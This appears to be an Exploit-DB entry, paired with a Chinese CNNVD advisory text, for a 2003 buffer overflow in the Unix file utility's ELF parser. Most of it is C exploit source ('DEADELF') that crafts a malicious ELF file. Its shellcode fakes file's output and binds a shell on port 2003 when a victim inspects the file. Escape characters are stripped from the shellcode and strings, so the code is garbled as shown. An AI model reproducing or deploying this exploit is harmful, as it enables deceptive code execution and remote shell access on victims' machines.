https://www.exploit-db.com/exploits/22326
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200312-187

file(1)是一款查看文件类型的工具。file(1)命令存在一个缓冲区溢出漏洞，本地攻击者可以利用这个漏洞以执行用户权限在系统上执行任意指令。问题存在于readelf.c中的587行tryelf()函数的doshn()调用中：doshn(class，swap，fd，getu32(swap，elfhdr.e_shoff)，getu16(swap，elfhdr.e_shnum)，getu16(swap，elfhdr.e_shentsize));doshn()’elfhdr.e_shentsize’最后一个参数将在之后用于readelf.c133行的read()函数中：if(read(fd，sh_addr，size)==-1)read()调用会拷贝’size’字节到readelf.c92行定义的’sh_addr’变量中：#definesh_addr(class==ELFCLASS32?(void*)&sh32:(void*)&sh64)用于read()函数的缓冲区大小只有0x20(32)字节，通过提供0x28(40)字节的’size’参数可导致覆盖堆栈中的EBP和EIP寄存器而以其他用户权限执行任意代码。用户可以构建恶意文件诱使其他用户来分析，导致发生缓冲区溢出，而以执行用户权限执行任意指令。

source: http://www.securityfocus.com/bid/7009/info

It has been reported that a memory allocation issue exists the file program. Although details of this issue are currently unavailable, it is likely that this issue could be exploited to cause a denial of service condition, and potentially execute code as the user of the file utility. 

/*
   __________________
/   Black Sand Project
   __________________
/
   Created by CrZ [[email protected]] LimpidByte [lbyte.void.ru] /06.03.2003/
/
   Bug discovered by iDEFENCE: http://www.idefense.com/advisory/03.04.03.txt
/   
   program name: DEADELF
/
   description: Exploit for file program <= 3.39
/
   info: program create file-exploit and when you 
/   make "file /path/to/this/file-exploit" shell
   will open on 2003 port.
/
   Usage: ./85deadelf <file-exploit> [return address]
/
   Example of work:
/
	[crz@blacksand crz]$ gcc -o 85deadelf 85deadelf.c
/	[crz@blacksand crz]$ ./85deadelf deadelf
	[+] Creating a evil file deadelf!
/	[+] Using address of shellcode = 0xbfffbd40
	[crz@blacksand crz]$ file deadelf
/	File: ASCII text
	[crz@blacksand crz]$ telnet localhost 2003
/	Trying 127.0.0.1...
	Connected to blacksand (127.0.0.1).
/	Escape character is '^]'.
	id;
/	uid=500(crz) gid=500(crz) groups=500(crz)
	: command not found
/	exit;
	Connection closed by foreign host.
/	[crz@blacksand crz]$

/   Tested against: file-3.37 (RedHat8.0)
		    file-3.38 (RedHat8.0)
*/


#include <fcntl.h>
#include <elf.h>
#include <stdio.h>


void usage(char *prog) {

	printf("nCreated by CrZ [[email protected]] Limpid Byte [lbyte.void.ru]n");
	printf("Usage: %s <name of evil file> [return address]nn",prog);
	exit(0);
}

int main(int argc, char **argv) {
	
/* 
   a simple shellcode that show fake result of file program & bind
/   shell on 2003 port by CrZ
*/
	
char shellcode[]=
	"x31xc0x31xdbx53xb3x01x50" /* write(1,"File: ASCII text");*/
	"x68x01x01x0ax0dx68x74x65"
	"x78x74x68x43x49x49x20x68"
	"x3ax20x41x53x68x46x69x6c"
	"x65x89xe1xb2x18xb0x04xcdx80"
        /* bind shell on 2003 port */
        "x31xc0x89xc3xb0x02xcdx80x38xc3x74x05x8dx43x01xcdx80"
        "x31xc0x89x45x10x40x89xc3x89x45x0cx40x89x45x08x8dx4d"
        "x08xb0x66xcdx80x89x45x08x43x66x89x5dx14x66xc7x45x16"
        "x07xd3x31xd2x89x55x18x8dx55x14x89x55x0cxc6x45x10x10"
        "xb0x66xcdx80x40x89x45x0cx43x43xb0x66xcdx80x43x89x45"
        "x0cx89x45x10xb0x66xcdx80x89xc3x31xc9xb0x3fxcdx80x41"
        "x80xf9x03x75xf6x31xd2x52x68x6ex2fx73x68x68x2fx2fx62"
        "x69x89xe3x52x53x89xe1xb0x0bxcdx80";
	
	int fd,i;
	Elf32_Ehdr elfhdr;
	long xret=0xbfffbd40;
	char *evilfile="bl00mps";
	char tmp[100];
	
	if(!argv[1]) usage(argv[0]);
	else evilfile=argv[1];
	if(argv[2]) sscanf(argv[2],"0x%x",&xret);
	
	printf("[+] Creating a evil file %s!n",evilfile);
	printf("[+] Using address of shellcode = 0x%xn",xret);	
	
	sprintf(tmp,"echo>%s",evilfile);
	system(tmp);
	fd=open(evilfile,O_WRONLY);

	bzero(&elfhdr,sizeof elfhdr );
	elfhdr.e_type=1; //type should by NOT ET_CORE (4) & NOT ET_EXEC (2)
	sprintf(elfhdr.e_ident,"x7fx45x4cx46x01x01x01"); //ELF32 FORMAT
	elfhdr.e_machine=1;
	elfhdr.e_version=1;
	elfhdr.e_entry=0;
	elfhdr.e_phoff=0;
	elfhdr.e_shoff=0;
	elfhdr.e_flags=0;
	elfhdr.e_ehsize=0;
	elfhdr.e_phentsize=0xfff; //define size for read()
	elfhdr.e_phnum=1; //this is for stop for() loop when read()
	elfhdr.e_shentsize=0xfff; //define size for read()
	elfhdr.e_shnum=1; //this is for stop for() loop when read()
	elfhdr.e_shstrndx=0;
	write(fd,&elfhdr,sizeof(elfhdr));
	
	for(i=0;i<20;i++) write(fd,&xret,4); //write new return address
	for(i=0;i<6000;i++) write(fd,"x90",1); //write nops
	write(fd,&shellcode,sizeof shellcode); //write shellcode

	close(fd);

	
	return 0;	
}

来源:US-CERTVulnerabilityNote:VU#100937
名称:VU#100937
链接:http://www.kb.cert.org/vuls/id/100937
来源:XF
名称:file-afctr-memory-allocation(11488)
链接:http://xforce.iss.net/xforce/xfdb/11488
来源:BID
名称:7009
链接:http://www.securityfocus.com/bid/7009
来源:OPENPKG
名称:OpenPKG-SA-2003.017
链接:http://www.securityfocus.com/archive/1/313847
来源：NSFOCUS
名称：4500
链接：http://www.nsfocus.net/vulndb/4500